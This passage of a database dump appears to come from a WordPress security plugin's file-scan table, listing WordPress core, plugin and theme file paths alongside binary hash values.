9�\'�tLYƭBq����','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('F5\'�?��\0��?Fe_F','wp-includes/wp-includes/nav-menu.php',0,'(������%��ӯq','(������%��ӯq','?^��в�W�}T{5�3�m�T�:�锟��G','',0,'?'),('F@ v��h^)���Ӷ�','wp-includes/wp-includes/class-wp-widget-factory.php',0,'�ե�ᡵ���|��I� ','�ե�ᡵ���|��I� ','(H��e3a�Z]��t\\�����\'�d��p���','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('Fo��ܿ,���폨','wp-content/themes/sg-window/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�J��\\Q����C','�M��]�-\'ݟ{ ���:��K�� B�O�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n�	:�›{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�j5\"g���ȿ�Z��','wp-includes/wp-includes/theme-compat/embed-404.php',0,'7�[R+S��A-\Za*e','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A��	','',0,'?'),('F�>���bû��6���','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',0,'R���Z�?f.��8��	','R���Z�?f.��8��	','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','삺�m��\n\'��P�','^���;(�R�@ݪ:��:_9���*j���','',0,'?'),('F�\n�����#�P�','wp-includes/wp-includes/class-snoopy.php',0,'�[�PQ��I��P4!��','�[�PQ��I��P4!��','�+�	��uzR�W	QW�|��5��� j[;U|�','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('G�?�cm�\nulf,1','wp-includes/wp-includes/css/dist/block-editor/style-rtl.min.css',0,'W.�M�л�=@�D�Yw#','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('G�|�xG��$�3V','wp-includes/wp-includes/css/dist/editor/style.css',0,'k����`�\0d���‘','k����`�\0d���‘','�2��*Pj%R4{?��M�rH�:�����b�~','',0,'?'),('G�`(X�� ��','wp-includes/wp-includes/js/utils.js',0,'���2���![pNI�5','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�ÂҶ�A-��>c�`','�E�\n�F	�	���M���%{��a���`,�','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��s�p���p1��','Uuu�	jK��>}��ʊ$|@.8K3����','',0,'?'),('G;)[}tڞ`8���C�','wp-includes/wp-includes/class-wp-user.php',0,'>��b�Zd��	��','>��b�Zd��	��','���mA�QW,�?�;��w�FT񎧳\\>��','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f��	e�d�&�g��+���','',0,'?'),('Gp�ؠ����Z�V�P�','wp-content/themes/sg-window/inc/customize-colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2g��y�(�I,��G��','�\raf�����M2M-ƿ?�R:Q����W','',0,'?'),('Gq�b٫	������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��C��̚{\"Hp�=','��R�����l��	�n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G���Y���lE{�','wp-includes/wp-includes/js/dist/escape-html.js',0,'�E����e����c�k�','�E����e����c�k�','8:���\Z�U$D_�t���8(f4�}%Uә�','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A˼ܗ\ri^o4~�','��Q9sY��&a��*�}J�x�1��u����','',0,'?'),('G�q׃����B�:','wp-includes/wp-includes/images/wpicons-2x.png',0,'��n�V�o�$��Of~7','��n�V�o�$��Of~7','�]کA=�ђ�%�q�%aM�����B�U�p','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�n���VJ�R�x�5��','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H��OZ\'�]1�T','���;@�O0,�KG#�&h0�RҘ�6�0���T','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{&��Þ���>��','�i$�z:1$s+»����̔��\Z��!o��','',0,'?'),('HF�x�~)U_A�vd��','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',0,'�b�j��u9)�\n6�5','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q�E�{�F�\n���','qC�&�+�N<[�l\\{V�h�R�)��Ž2�','',0,'?'),('HKC�[���*GD�','wp-includes/wp-includes/js/wp-lists.js',0,'�M4���KYs:��ȫ�','�M4���KYs:��ȫ�','󩶓����Z-3w�Eї\rqK]��3�]��.X','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('H�s1���$7�$','wp-content/themes/sg-window/img/icons/small/friendster.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�EQ?}��(O���','�g��jJ��W�kljǶ��w�`�/jA','',0,'?'),('H�@C�_Ӭ��*�S�','wp-includes/wp-includes/js/dist/format-library.js',0,'�ԯ䠦_��P^����','�ԯ䠦_��P^����','#H����X�{��M\'���%��&6�D.̺x','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('H�͛�&����;�fY7','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�/��h<��U��','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('H�h]x�O.�:�P��R�','wp-content/themes/sg-window/css/scheme-0.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','΋��/+��N�X�m2S','ZqJ�6���P#̵$���v>%�I��,n��?(l','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�4/[\"\r���R�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Po��3���~��Q','����k��_�?�E�%�Gޓi��BEOyQ��','',0,'?'),('H�fM�+t���~`�i','wp-includes/wp-includes/css/media-views.css',0,'���5w�pأ����','���5w�pأ����','3ֳ���}��!p�B����A����)k�{�F�','',0,'?'),('I	is҉�ȱɁKA�>�','wp-includes/wp-includes/Requests/Transport/fsockopen.php',0,'�>�r�����QHˆV','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\r���rY�VU�f�','��[����핚���\"�M��t��&yָ�IC','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y	N��ɔ]7l�','M�>����f(E���r_hX���oۃ��8@�+O','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H\r\r�0�X/^�0R','O��1�-p�Qۊ��8�Z+�$[��j���K��','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=؜1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('Ie�x�?��b�T].o','wp-includes/wp-includes/ms-load.php',0,'�),l�\"��?�V�?%','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I��L;/ܣt�\"���k	','wp-includes/wp-includes/SimplePie/gzdecode.php',0,'��rF<�\ZiǨu��','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d]Q1g�\0�H.Ǟp','>���Г����c[��Fep�[��zya��oz','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('I�a|�&�]}l?�h���','wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php',0,'b�v�1^l�&)g�4��','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('J�%.��~�—q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��	�~�5��8�ͫ;�','�	�\n�Z\rZ�B�[9��z��S)��4M%��','',0,'?'),('J6\"����{)�{��|[','wp-content/themes/sg-window/inc/css/page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�Lr�����cK�u','�Xm��l�m�ŕf͋h�B��;�cMK$��','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӛ���G��\'W���','���ij��x�\0ךM5+�i���@èQj8�v\"','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�?��T���i�\"=','\"��On]O�k;��Y�}��rG��yf�%�O 8\\','',0,'?'),('J��Mu���\Z	Z�f9m','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P1p1.php',0,'}+#z,��e�rEJ-','}+#z,��e�rEJ-','sf��q@��8�!yW�&ڔA�+/�uY���44�G','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��R��W��ÔO[��J','bO�Q�wù�LѠâ��������9Q��lrl','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J򾁬��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|	���#PV	/{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K41]�ڭ��@�#�','wp-includes/wp-includes/blocks/search.php',0,'էL\n�8���{s���','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0,}J\"��N������','�ޝ�+-%]����ٲ�d�)�_�v?O�(�Y\'\\','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\j�6Ii��\\u�v','\"9t��Y?�²�L���ykg������=�ۢ�','',0,'?'),('KR��&�J\"_}�3c?�','wp-includes/wp-includes/images/wpspin.gif',0,'hk�u�R�\r@9k���','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('Kj\\\"�p�隍Ӥu���','wp-includes/wp-includes/random_compat/cast_to_int.php',0,'�!�>����=I���O','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('K|�_�dҪ��p�T�','wp-includes/wp-includes/js/tinymce/plugins/charmap/plugin.min.js',0,'=B�쟄��P\rL��','=B�쟄��P\rL��','•�x[�G��-�90b.z�G��az�>�r','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K�����կ̺�tл�','wp-includes/wp-includes/js/codemirror/codemirror.min.css',0,'�23j���1��(D��','�23j���1��(D��','��Ό�,a�u��@�s�Y%K���-o��n\r�','',0,'?'),('K���+��)[�NC���','wp-includes/wp-includes/js/json2.js',0,'s��{N�|EO�0�','s��{N�|EO�0�','q3�..�j G\\R�nݼI/T��-�','',0,'?'),('K�c��#2s�/(�\"�','wp-includes/widgets/class-wp-widget-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�E,��ߓ%_�','<6�8��1J�ߧr(;�c�?@�|uR�\nŞ�','',0,'?'),('K��<�H<7�E�,l��','wp-content/plugins/wordfence/views/waf/options-group-brute-force.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�p�k�<���#Y','Qx�b���nbWK����E*�l�o��ޅ��ʛ��','',0,'?'),('K��cE�j��zeů�8','wp-includes/block-patterns/text-three-columns-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�tH�W��%���','ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V','',0,'?'),('K��ɹ���jwD�x�','wp-content/plugins/wp-cerber/assets/flags/us.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��V�w\Z]�Ay��','���L�CI`�^�J4�=��0���C�C}�','',0,'?'),('K����\r\\Uz��\Z:\'','wp-includes/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�*��F谯��<��l','�®�R�l�U�����wz�ank��G�t�3�','',0,'?'),('K��]C��l7:�D\0','wp-admin/js/widgets/media-audio-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P IM�;p8vn��[�S','����9j��lxB�eH:�y�%}�c	TP�_�','',0,'?'),('K�.�6���<F��R','wp-includes/wp-includes/js/mediaelement/mediaelement.min.js',0,'-6�������m����','-6�������m����','���%�]�cط�Z���7�\n�ԋ���2���','',0,'?'),('K�Lx<C���H��e\Z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�EN�Ăۛ(\n�n','����Ѭ}^�EF����>��ڂB��','',0,'?'),('K�bw��y��.�3�{¥','wp-content/plugins/wp-cerber/assets/flags/pk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����00�%��[.�','Gjۀ���H��$�׃��m\'�^ O�n���','',0,'?'),('K� ���*�;ܼ�nc','wp-includes/blocks/calendar/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y��P#����(i�','�D���]^��~��>�r~]�E^anK-qHMe�','',0,'?'),('K��W�&\0\0K�\06�G�','wp-admin/js/set-post-thumbnail.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':1N�(�xl�X��\'','v9�\n{lK��~q�#�>��ߦ��� J�`~','',0,'?'),('K�K+�2�	aeZ�e','wp-includes/class-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I#�h�Z~�����@��','�Xs�W��l����:\"��0����;����LL','',0,'?'),('L�%M��r\0Q�','wp-includes/wp-includes/blocks/social-link/block.json',0,'q�&X�@�$>y�@�','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('LRTU��n?bΌ�','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js',0,'f\\�DŽH�$�M(�l�','f\\�DŽH�$�M(�l�','@��3�\nQz�p��\n�j;Q��w��k���13�<','',0,'?'),('L;6w���/�^5�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-setting.php',0,'��,�#Y�bu3�����','��,�#Y�bu3�����','�Ӻ�f����\r���o!�cY	�o��\r����','',0,'?'),('L<#���\Z����}','wp-includes/js/tinymce/skins/lightgray/img/loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('L#��/۰*�3���\r','wp-admin/includes/class-wp-terms-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0Up�\0�.c*�a�','\'�]pn������v�\r>A���;¯P \Z(-��','',0,'?'),('L(��n�9[2�C6�','wp-includes/js/zxcvbn-async.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��E��\nO\\��Y�b','��\'FP�\Z�/G\n��J����\\B��\Z��IT�','',0,'?'),('LIz���$�R`�+','wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif',0,'9K���M�:�Tf�9','9K���M�:�Tf�9','��;���T��O`(6��,�sk�Z���c�R��+','',0,'?'),('LR7Q��ToG|�{','wp-content/plugins/wordfence/lib/viewFullActivityLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�>��&Q)�Fy�k','e�i�p��r9ݴZ\\�\\Q~`�?�7�=�R�','',0,'?'),('Lap���8g�V�,��g�','wp-includes/js/dist/vendor/react-dom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('LsЇś\n�c}>�K��','wp-includes/css/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`b�L֏�Uy�/','��\r�~�W$A�\"ac�����G<��HZ<�8`','',0,'?'),('Lz����Z��#�<','wp-includes/class-wp-locale-switcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"�?�F�w,�T��','!@�B��<6�ꁒ�Ku��Pm=��+�/c_�','',0,'?'),('L�\'�P0������','wp-content/themes/sg-window/inc/admin-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k�H0�4�ح�','�}M��%��3&Ǔ�l�Hqw�RYW�M4:�=��','',0,'?'),('L�����t@m*V�|��\0','wp-includes/wp-includes/js/jquery/ui/accordion.js',0,'������Z����a��','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('L�)P))֗�nS�|�','wp-includes/wp-includes/class-wp-error.php',0,'�l� &�0?&�c~��','�l� &�0?&�c~��','G�bM[G&Jr�F�E����1�r�s�L,t�(�W','',0,'?'),('L��S�h��y����;�','wp-includes/wp-includes/js/customize-base.min.js',0,'�$��r�#��j	�','�$��r�#��j	�','LF�#�53��uu��t�F	�չRk*xs_{E','',0,'?'),('L���\\���\0\0����\0','wp-includes/wp-includes/robots-template.php',0,'�\\��líܓM��','�\\��líܓM��','^�h��R߻u�ɆCZ11��S���&̊p0','',0,'?'),('L��d�8�ͽ���h`L�','wp-includes/wp-includes/block-patterns/heading-paragraph.php',0,'����?z�I�����E','����?z�I�����E','�i�,��m�O���#�?Vb�,�C-ܢcž\Zh�','',0,'?'),('L��e�t\"pc(	�e�','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yAS9�ie��P�','����I�&���e�*��7�K38�����','',0,'?'),('L���M��>�!�r�','wp-content/themes/shootingstar/functions/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3(�(B�����5','��kOL�f��<��z߈�������߫�m�eR','',0,'?'),('Lͧ������O�n7','wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css',0,'���\\PI�ɥ��<\\��','���\\PI�ɥ��<\\��',')�Y@�u&�Kg��\0?���\\F\'�X0�Lj�','',0,'?'),('L�\r�%��{��','wp-includes/blocks/social-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�&X�@�$>y�@�','�#V�b��v����E\Z\Z6�妅Y9l�\"�s�','',0,'?'),('L�>t���N�����','wp-admin/css/colors/blue/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5Iה�g,)Z�YM�','�\\k��S�뚑�n wW��	�!�*�~�v��','',0,'?'),('L��)��a$�D-�Ӯ�J','wp-includes/js/tinymce/plugins/wplink/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m��3���ܖ3��M','z�N\'A�%�S��@4�U���BD���q����','',0,'?'),('MR8⬻�,�ͽ�=�S','wp-includes/wp-includes/js/jquery/ui/autocomplete.min.js',0,'K�s(.=����ͪ�','K�s(.=����ͪ�','�a�b��u�7���K\'2��V�š�=y��','',0,'?'),('Mx1NjTm�R_2o','wp-content/plugins/wordfence/views/dashboard/global-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˫\'�m�`�0>�+#��','���������p������Pv?Z�F��QQcj','',0,'?'),('M1��/�n��̖Q��','wp-includes/css/dist/components/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c��`=\"����y�)','�xp�3�>9eQ<�jCQ���g@M�/�w','',0,'?'),('M?,5�*�����K*�f','wp-admin/js/post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tm�{$,����','A�Y����}�U=��2��\'\Z�� �Z�0�<�','',0,'?'),('MW�	���:��ي','wp-admin/images/align-none.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eqd2���u����\r','�g(�1�X�{� [].���T����A��','',0,'?'),('MY��G��\\tX����/','wp-includes/customize/class-wp-customize-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��S?��|��G','h	�3|:Q9z���4Y1[�{^�	$;�#�q��','',0,'?'),('Mj~����?Q���BU','wp-includes/wp-includes/images/uploader-icons-2x.png',0,'���&-��O��Õ�~','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('M�,�\\!z����|�y','wp-includes/wp-includes/theme-compat/header-embed.php',0,'Omz8��F����','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('M�z���j\"=���T�','wp-includes/wp-includes/customize/class-wp-customize-background-image-setting.php',0,')�@�t��j23��W',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('M�[\Z�2hT�	�K�','wp-content/plugins/wp-cerber/assets/flags/tr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<~Qk�dIr&��-!','�\"��i0�M��˩��VJc���]�3�\n��[','',0,'?'),('M���)��0xڀ�=0�','wp-content/themes/shootingstar/js/selectnav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JƑ�uf�9a��D�','�ZC�C�Nf�`,�&\nk�� 